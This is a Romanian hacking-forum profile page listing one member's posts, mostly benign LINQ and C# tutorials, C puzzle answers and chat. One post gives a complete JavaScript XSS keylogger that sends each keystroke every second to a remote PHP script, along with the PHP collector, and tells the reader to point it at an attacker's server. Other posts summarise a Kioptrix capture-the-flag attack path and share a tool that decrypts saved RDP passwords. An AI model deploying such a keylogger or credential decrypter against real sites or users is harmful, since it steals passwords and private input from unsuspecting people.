Jump to content

alien

Active Members
 View Profile  See their activity

  • Posts

    331

  • Joined

  • Last visited

  • Days Won

    2

 Content Type 

Everything posted by alien

  1. alien
    In nici un caz sa nu mergeti pe site-uri gen onlinehashcrack com si sa da-ti sa verifice daca parola voastra se gaseste in baza lor de date de hash-uri, o sa genereze hash-ul si o sa o adauge parola in baza lor de date. Este una din metodele lor phising
  2. alien
    Kioptrix Challenge #4 is a special system designed specially with weaknesses build into it. The goal is to gain highest privilege access(root). The VM image can be downloaded here: Kioptrix ? Challenge VM #4 finally done Videos: Limited Shell Method Scanned network for the target [Netdiscover] Port scanned the target [unicornScan] Banner grabbed the services running on the open port(s) [NMap] Interacted with the web server & logged into the system anonymously [Firefox & Burp Proxy] Discovered & exploited an local file inclusion vulnerably to enumerate possible users [burp Proxy] Logged into the Web UI as each user to discover their password in plain text [Firefox & Burp Proxy] Remotely connected to as a user and broke out of the limited shell [sSH] Enumerated the system environment to identifying limiting factors. [iPTables] Escalated privileges via a vulnerable kernel version [sock_sendpage] Accessed the 'flag' [Text file] SQL Injection Method Scanned network for the target [Netdiscover] Port scanned the target [unicornScan] Banner grabbed the services running on the open port(s) [NMap] Interacted with the web server & discovered a the web application that is possibly subject to a SQL injection vulnerability [Firefox] Exploited the SQL injection and enumerated database [sqlMap] Uploaded a web shell backdoor [sqlMap & Netcat] (Limited user) Manually performed SQL injection injection to dump database [burp Proxy] Created a web shell on the target [burp Proxy & Netcat] (Limited user) Created a backdoor shell via a cron job [burp Proxy & Netcat] (Superuser) Accessed the 'flag' [Text file] Created a backdoor shell via a cron job [burp Proxy & Metasploit] (Superuser) Local file inclusion Method Scanned network for the target [Netdiscover] Port scanned the target [unicornScan] Banner grabbed the services running on the open port(s) [NMap] Interacted with the web server & logged into the system anonymously [Firefox & Burp Proxy] Discovered & exploited an local file inclusion vulnerably to enumerate possible users. [burp Proxy] Exploited the same local file inclusion to fingerprint the web service & inject code into the PHP session data [burp Proxy] Created a web shell on the target [burp Proxy & Netcat] (Limited user) Created a shell and to escalated privileges executed it from a service running as superuser [burp Proxy & Metasploit] Accessed the 'flag' [Text file] Credits and thanks to g0tmi1k
  3. alien
    Ethical hackers: cd .. ./Hack.bat
  4. alien

    Salutare RST

    alien replied to daNNy.bv's topic in Bine ai venit

    Bine ai venit! Baga tare pe VB/C#
  5. alien
    Am mai adaugat niste resurse despre LINQ: tutoriale video, Linq in action si Cheat sheet. https://rstcenter.com/forum/48905-c-linq-resources.rst
  6. alien
    Some LINQ resources: LINQ in Action Download:linq-in-action.9781933988160.30173.zip This book has been written so that you can choose what you want to read and how you want to read it. It has 5 parts, 13 chapters, an appendix, a list of resources, and a bonus chapter. Part 1 introduces LINQ and its toolset. It also helps you to write your first LINQ queries. Part 2 is dedicated to LINQ to Objects and querying in-memory collections. Part 3 focuses on LINQ to SQL. It addresses the persistence of objects into relational databases. It will also help you discover how to query SQL Server databases with LINQ. Part 4 covers LINQ to XML. It demonstrates how to use LINQ for creating and processing XML documents. Part 5 covers extensibility and shows how the LINQ flavors fit in a complete application. LINQ Cheat sheet Download:LINQ CHEAT SHEET.ZIP This is a very useful comparison of LINQ vs Lambda Syntax. LINQ Videos - Stanfield DownloadDownload LINQ_VIDEOS.zip from Sendspace.com - send big files the easy way Contains 8 video covering almost all there is about LINQ in C#. Part 1 Password rstcenter.com
  7. alien
    This tutorial will demonstrate the basics of using LINQ to SQL in C#. What is LINQ Suppose you are writing an application using .NET. Chances are high that at some point you’ll need to persist objects to a database, query the database, and load the results back into objects. The problem is that in most cases, at least with relational databases, there is a gap between your programming language and the database. Good attempts have been made to provide object-oriented databases, which would be closer to object-oriented platforms and imperative programming languages such as C# and VB.NET. However, after all these years, relational databases are still pervasive, and you still have to struggle with data access and persistence in all of your programs. The original motivation behind LINQ was to address the conceptual and technical difficulties encountered when using databases with .NET programming languages. With LINQ, Microsoft’s intention was to provide a solution for the problem of object-relational mapping, as well as to simplify the interaction between objects and data sources. LINQ eventually evolved into a general-purpose language-integrated querying toolset. This toolset can be used to access data coming from in-memory objects (LINQ to Objects), databases (LINQ to SQL), XML documents (LINQ to XML), a file-system, or any other source. So now that we know what LINK is, lets see it in action. We will be implementing a very basic Phonebook. Step 1 - Defining the database You can use agenda.sql file to create the database automatically. Create the two tables in you're SQL server. Persons CREATE TABLE [dbo].[Persons]( [PersonID] [int] NOT NULL, [Name] [nvarchar](30), [Address] [nvarchar](100) Phones CREATE TABLE [dbo].[Phones]( [PhoneID] [int] NOT NULL, [PersonID] [int] NOT NULL, [Number] [char](15), [Description] [nvarchar](50) Step 2 - LINQ to SQL Now we need to link the two tables from the database to our LINQ map(DBML). Open Agenda_Linq.dbml file, delete any tables there and using the Server Explorer from VS drag and drop the two tables from the database in the DBML designer. Now we need to create an association between the two tables: right click-->add-->association. Select Parent class - Persons and Child class and link the files PersonID in the two tables. Now the linking to your database is done. Step 3 - Use LINQ to work with the database Select all persons from Persons table /// <summary> /// Gets all persons. /// </summary> /// <returns></returns> public IEnumerable<Person> GetAllPersons() { Agenda_LinqDataContext agenda = new Agenda_LinqDataContext(); DataLoadOptions option = new DataLoadOptions(); option.LoadWith<Person>(person => person.Phones); agenda.LoadOptions = option; var query = from person in agenda.Persons orderby person.Name select person; var listOfPersons = query.ToList(); agenda.Dispose(); return listOfPersons; } Add/Delete Person internal void AddNewPerson(Person p) { Agenda_LinqDataContext agenda = new Agenda_LinqDataContext(); agenda.Persons.InsertOnSubmit(p); agenda.SubmitChanges(); agenda.Dispose(); } internal void DeletePerson(Person selectedPerson) { Agenda_LinqDataContext agenda = new Agenda_LinqDataContext(); agenda.Persons.Attach(selectedPerson); agenda.Persons.DeleteOnSubmit(selectedPerson); agenda.SubmitChanges(); agenda.Dispose(); } Add/Delete Phone internal void AddPhone(Phone p) { Agenda_LinqDataContext agenda = new Agenda_LinqDataContext(); agenda.Phones.InsertOnSubmit(p); agenda.SubmitChanges(); agenda.Dispose(); } internal void DeletePhone(Phone phone) { Agenda_LinqDataContext agenda = new Agenda_LinqDataContext(); agenda.Phones.Attach(phone); agenda.Phones.DeleteOnSubmit(phone); agenda.SubmitChanges(); agenda.Dispose(); } You get the picture. As you can see the database is transformed in C# classes by the DBML and you are using now those classes instead of the actual database. Full source code here: hg clone https://bitbucket.org/rokill3r/linqagenda Alien
  8. alien
    Schimba dracu link-urile! E al doilea thread cu adf.ly pe ziua de azi.
  9. alien
    Javascript Keylogger The following code is a javascript Keylogger, it's hook each keystrokes on a webpage and send them to a remote php script every seconds. Replace localhost with attacker server dns and path. keylogger.js var keys=''; document.onkeypress = function(e) { get = window.event?event:e; key = get.keyCode?get.keyCode:get.charCode; key = String.fromCharCode(key); keys+=key; } window.setInterval(function(){ new Image().src = 'http://localhost/demo/webA/keylogger.php?c='+keys; keys = ''; }, 1000); PHP Grabber The following code will receives and saves all data sent by the keylogger. keylogger.php <?php if(!empty($_GET['c'])) { $logfile = fopen('data.txt', 'a+'); fwrite($logfile, $_GET['c']); fclose($logfile); } ?> Source: Tutorial - XSS Keylogger
  10. alien
    Va exista o colaborare intre rst si insecurity? sau o sa fie iar double post/steal intre cele 2 forumuri?
  11. alien
    Si totusi raman la ce am afirmat mai sus. for (y = i; y < strlen(s) + i; y++) s[y] = s[contor++]; Initial s = "SimpleCChallange" strlen(s) = 16 La urmatoarea iteratie: s="SimpleCChallangeS" strlen(s)=17 .... For-ul merge pana la infinit. LE: faine challenge-uri si C-ul e limbajul cel mai potrivit, are o gramada de reguli
  12. alien
    Are dreptate Nytro, pe 64bit un pointer e dublu fata de int si parca si long...
  13. alien
    Nu l-am rulat, dar presupun ca va da eroare de outofbounds pe char s[256], deoarece for-ul este infinit, avand conditia de oprire strlen(s) care se modifica la fiecare iteratie.
  14. alien
    sizeof(int)=4, sizeof(char*)=4, sizeof(void*)=4, sizeof(char)=1 21/4 = 5
  15. alien
    Frig la BV.
  16. alien
    @cmiN: Am pus pe repository si DataProtection
  17. alien
    da-mi si mie pm
  18. alien
    As some of you requested, I've added a class to decrypt passwords found in *.rdp files. To work with this class add the DLL to references, include the namespace in you're class "using DataProtection;" and use the two functions provided by DataProtectionWrapper: Encrypt(string) and Decrypt(string) The repository can be found here: hg clone https://bitbucket.org/rokill3r/rdppassworddecrypter DLL can be found here: DataProtection.dll using System; using System.Collections.Generic; using System.Linq; using System.Text; using DataProtection; namespace RdpPasswordDecrypter { class Program { static void Main(string[] args) { try { string password = "01000000D08C9DDF0115D1118C7A00C04FC297EB01000000B03D76F7FF29E741AC1991D9E850476500000000080000007000730077000000106600000001000020000000DA8BB4AC41DE92695BF32E8F756F6C7EA1A7D939EE98C99D79740DF7A5DD66B7000000000E8000000002000020000000C1CF8B672062B84AC36624E43D316383B6ADB08D026A9A1C5DF78162C04D421820000000D94E470B71E687C0A4DF24E2800983C7071AAC55B0122FCD8AD7F490F932899B4000000024356DC7D805EEF60CEEB2F3D0D9232CD488C0C2882950B7CE10810480E61997307B6C1DC95C263033178F4272458BA6CCAF8F84487F61677A5A291265582964"; Console.WriteLine("Decrypting ..."); Console.WriteLine("Password: " + DataProtectionWrapper.Decrypt(password)); } catch (Exception ex) { Console.WriteLine(ex.Message); } } } } Log output: Decrypting ... Password: rstcenter.com Press any key to continue . . . Alien
  19. alien
    Sectiunea Reply-uri nu mai apare pe main page, de azi.
  20. alien

    Programare

    alien replied to Dannymzw's topic in Programare

    C# .Net(poti sa treci usor si pe ASP) sau Java. Cam asta e ce se cauta momentam pe piata muncii. C++ a devenit o nisa destul de limitata parerea mea. C# si Java sunt limbaje pt programare "in masa" ca sa zic asa. Sunt usor de utilizat, iar developerul se poate concentra pe dezvoltarea de feature-uri si nu pe alte tampenii(ex garbage control, malloc etc). Pe langa un limbaj de baza ar trebui sa sti si un limbaj de scripting (python, ruby...). Succes! PS. HTML nu e limbaj de programare! ML = markup language!
  21. alien

    RDP-uri Gratis

    alien replied to Vlachs's topic in Off-topic

    De ce vrei sa decriptezi parola daca e deja salvata in fisier? Poti sa dai import la fisier in RDP client. Am o clasa in C# care decripteaza fisierele .rdp. Daca sunt doritori o sa apara la sectiunea Programare.
  22. alien
    Prinde bine. Chiar aveam nevoie la munca. Mersi
  23. alien
  24. alien

    CPU temp

    alien replied to crs12decoder's topic in Off-topic

    Si al meu se incalzeste daca il tin pe pat. E si normal: nu isi trage aer Daca iti iei coolpad iti recomand de la Zalman. Poate sa-ti scada si cu 10-15 grade.
  25. alien
    Simplu si la obiect. Ca idee(nu prea stiu php) se pot folosi regex pentru determinarea de IP : PORT in $content, iar adresa sa fie transmisa prin parametru. Ex: /script.php?content=http://hidemyass.com/proxy-list&maxpage=5 Regex pt IP $string = "255.255.255.255"; if (preg_match( '/^(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)(?:[.](?:25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)){3}$/', $string)) { echo "IP address is good."; }
×
×
  • Create New...